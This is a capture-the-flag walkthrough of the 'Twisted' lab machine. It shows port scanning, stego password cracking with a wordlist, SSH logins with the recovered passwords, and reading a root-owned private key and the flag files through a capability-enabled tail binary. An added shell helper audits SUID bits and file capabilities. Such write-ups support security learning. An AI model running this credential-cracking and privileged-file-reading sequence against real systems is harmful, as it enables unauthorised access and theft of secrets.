[HMV] Twisted
0x00 Setup
Attacker IP: 172.16.1.25
Target IP: 172.16.1.89
0x01 Attack
Scan the target for open ports with Nmap
┌──(root㉿Kali-VM)-[~]
└─# nmap -sC -sV -p- 172.16.1.89
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-15 09:58 CST
Nmap scan report for 172.16.1.89
Host is up (0.00049s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.14.2
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.14.2
2222/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 6763a0c98b7af342ac49aba6a73ffcee (RSA)
| 256 8cce8747f8b81a1a78e5b7ce74d7f5db (ECDSA)
|_ 256 9294660b92d3cf7effe8bf3c7b41b75a (ED25519)
MAC Address: 08:00:27:29:18:4B (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.95 seconds
Two ports were found: 80 (HTTP) and 2222 (SSH). Start with HTTP.
The images on the site look like they carry steganography; download them and crack them with stegseek
┌──(root㉿Kali-VM)-[~/work]
└─# stegseek ./cat-hidden.jpg /usr/share/wordlists/rockyou.txt
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Found passphrase: "sexymama"
[i] Original filename: "mateo.txt".
[i] Extracting to "cat-hidden.jpg.out".
┌──(root㉿Kali-VM)-[~/work]
└─# cat ./cat-hidden.jpg.out
thisismypassword
┌──(root㉿Kali-VM)-[~/work]
└─# stegseek ./cat-original.jpg /usr/share/wordlists/rockyou.txt
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Found passphrase: "westlife"
[i] Original filename: "markus.txt".
[i] Extracting to "cat-original.jpg.out".
┌──(root㉿Kali-VM)-[~/work]
└─# cat cat-original.jpg.out
markuslovesbonita
Scanning the website turned up nothing else, so the guess is that the passwords just recovered are for logging in to SSH directly. Logging in as root failed; recalling the Original filename: "mateo.txt" reported by stegseek, logging in as user mateo succeeded
[C:\~]$ ssh mateo@172.16.1.89 2222
Connecting to 172.16.1.89:2222...
Connection established.
To escape to local shell, press Ctrl+Alt+].
Linux twisted 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Oct 14 03:21:44 2020 from 192.168.1.58
mateo@twisted:~$ id
uid=1000(mateo) gid=1000(mateo) groups=1000(mateo),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
mateo@twisted:~$ whoami
mateo
A hint was found in mateo's home directory
mateo@twisted:~$ ls -al /home/mateo/
total 36
drwxr-xr-x 3 mateo mateo 4096 Mar 14 22:12 .
drwxr-xr-x 5 root root 4096 Oct 14 2020 ..
-rw------- 1 mateo mateo 5 Oct 14 2020 .bash_history
-rw-r--r-- 1 mateo mateo 220 Oct 13 2020 .bash_logout
-rw-r--r-- 1 mateo mateo 3526 Oct 13 2020 .bashrc
drwxr-xr-x 3 mateo mateo 4096 Oct 14 2020 .local
-rw------- 1 mateo mateo 25 Oct 14 2020 note.txt
-rw-r--r-- 1 mateo mateo 807 Oct 13 2020 .profile
-rw------- 1 mateo mateo 53 Mar 14 22:12 .Xauthority
mateo@twisted:~$ ls -al /home/mateo/note.txt
-rw------- 1 mateo mateo 25 Oct 14 2020 /home/mateo/note.txt
mateo@twisted:~$ cat /home/mateo/note.txt
/var/www/html/gogogo.wav
This is a path on the web server; opening it yields a WAV audio file. It sounds like Morse code, so it was transcribed with a decoding website
Not clear what it is for. Next, check for privileged (SUID) commands
mateo@twisted:~$ find / -perm -u=s -type f 2>/dev/null
/home/bonita/beroot
/usr/bin/su
/usr/bin/umount
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/mount
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/newgrp
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
Nothing here looks usable for privilege escalation; check the users instead
mateo@twisted:~$ cat /etc/passwd | grep "/bin/"
root:x:0:0:root:/root:/bin/bash
sync:x:4:65534:sync:/bin:/bin/sync
mateo:x:1000:1000:mateo,,,:/home/mateo:/bin/bash
markus:x:1001:1001:,,,:/home/markus:/bin/bash
bonita:x:1002:1002:,,,:/home/bonita:/bin/bash
There is a markus user, which matches the earlier mateo: both are the filenames hidden in the stego images. Try logging in as markus
[C:\~]$ ssh markus@172.16.1.89 2222
Connecting to 172.16.1.89:2222...
Connection established.
To escape to local shell, press Ctrl+Alt+].
Linux twisted 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
/usr/bin/xauth: file /home/markus/.Xauthority does not exist
markus@twisted:~$ id
uid=1001(markus) gid=1001(markus) groups=1001(markus)
markus@twisted:~$ whoami
markus
Login succeeded; check the home directory
markus@twisted:~$ ls -al ~
total 32
drwxr-xr-x 3 markus markus 4096 Mar 14 22:43 .
drwxr-xr-x 5 root root 4096 Oct 14 2020 ..
-rw-r--r-- 1 markus markus 220 Oct 14 2020 .bash_logout
-rw-r--r-- 1 markus markus 3526 Oct 14 2020 .bashrc
drwxr-xr-x 3 markus markus 4096 Oct 14 2020 .local
-rw------- 1 markus markus 85 Oct 14 2020 note.txt
-rw-r--r-- 1 markus markus 807 Oct 14 2020 .profile
-rw------- 1 markus markus 53 Mar 14 22:43 .Xauthority
markus@twisted:~$ cat ~/note.txt
Hi bonita,
I have saved your id_rsa here: /var/cache/apt/id_rsa
Nobody can find it.
This points to user bonita's SSH private key, but only root has read/write permission on it
markus@twisted:~$ ls -al /var/cache/apt/id_rsa
-rw------- 1 root root 1823 Oct 14 2020 /var/cache/apt/id_rsa
This step is strange: the writeups online all say to use the tail command to read /var/cache/apt/id_rsa
markus@twisted:~$ tail -n 80 /var/cache/apt/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
[private key contents omitted]
-----END OPENSSH PRIVATE KEY-----
But the tail binary has no special permission bits; its mode is identical to cat and head, which cannot read the file
markus@twisted:~$ ls -al /usr/bin/tail
-rwxr-xr-x 1 root root 72608 Feb 28 2019 /usr/bin/tail
markus@twisted:~$ ls -al /usr/bin/cat
-rwxr-xr-x 1 root root 43744 Feb 28 2019 /usr/bin/cat
markus@twisted:~$ ls -al /usr/bin/head
-rwxr-xr-x 1 root root 47840 Feb 28 2019 /usr/bin/head
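`ls -l` only shows the mode bits, so the SUID search above cannot explain a binary that reads root-only files. A binary can also be granted that ability through Linux file capabilities (for example cap_dac_read_search or cap_dac_override), which live in an extended attribute and are only visible through getcap. The following audit helper is added here and is not part of the original writeup; it reports both SUID/SGID bits and file capabilities for a given path, and `scan_caps` complements the `find / -perm -u=s` enumeration with a capability walk.

```shell
#!/bin/sh
# Added audit helper (not from the original writeup): explain why a
# binary may read files its caller cannot. SUID/SGID come from the mode
# bits; file capabilities are stored as an xattr and need getcap.

# Usage: audit_binary /path/to/binary
# Prints "<path>: <findings>" and returns 0 if any privilege was found,
# 1 if the binary is clean, 2 if the path does not exist.
audit_binary() {
    path=$1
    [ -e "$path" ] || { echo "no such file: $path" >&2; return 2; }
    findings=""
    # Mode string such as -rwsr-xr-x: an 's' (or 'S') in column 4 means
    # setuid, in column 7 setgid. Parsing ls keeps this POSIX-portable.
    mode=$(ls -ld "$path" | cut -c1-10)
    case "$mode" in ???[sS]??????) findings="$findings setuid" ;; esac
    case "$mode" in ??????[sS]???) findings="$findings setgid" ;; esac
    if command -v getcap >/dev/null 2>&1; then
        # getcap prints nothing for a binary without capabilities
        caps=$(getcap "$path" 2>/dev/null || true)
        case "$caps" in
            *cap_dac_read_search*|*cap_dac_override*)
                # these bypass file read/write permission checks entirely
                findings="$findings dac-bypass-cap:${caps#"$path"}" ;;
            *cap_*) findings="$findings other-cap:${caps#"$path"}" ;;
        esac
    else
        echo "note: getcap not installed, capabilities not checked" >&2
    fi
    [ -n "$findings" ] || return 1
    echo "$path:$findings"
    return 0
}

# Walk a tree and list every file carrying capabilities; this is the
# check that find / -perm -u=s -type f misses.
scan_caps() {
    root=${1:-/}
    command -v getcap >/dev/null 2>&1 || { echo "getcap not installed" >&2; return 2; }
    getcap -r "$root" 2>/dev/null
}
```

Run `audit_binary /usr/bin/tail` on the box to see whether a capability rather than a mode bit accounts for the behaviour; a defender can run `scan_caps /usr` periodically and alert on any cap_dac_* entry.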
The intended solution is presumably to obtain the private key with tail and then log in as bonita, but since tail can read files we have no permission to read, why not just grab /root/root.txt directly?
markus@twisted:~$ tail -n 80 /root/root.txt
HMVwhereismycat
markus@twisted:~$ tail -n 80 /home/bonita/user.txt
HMVblackcat
0x02 Summary
Weird.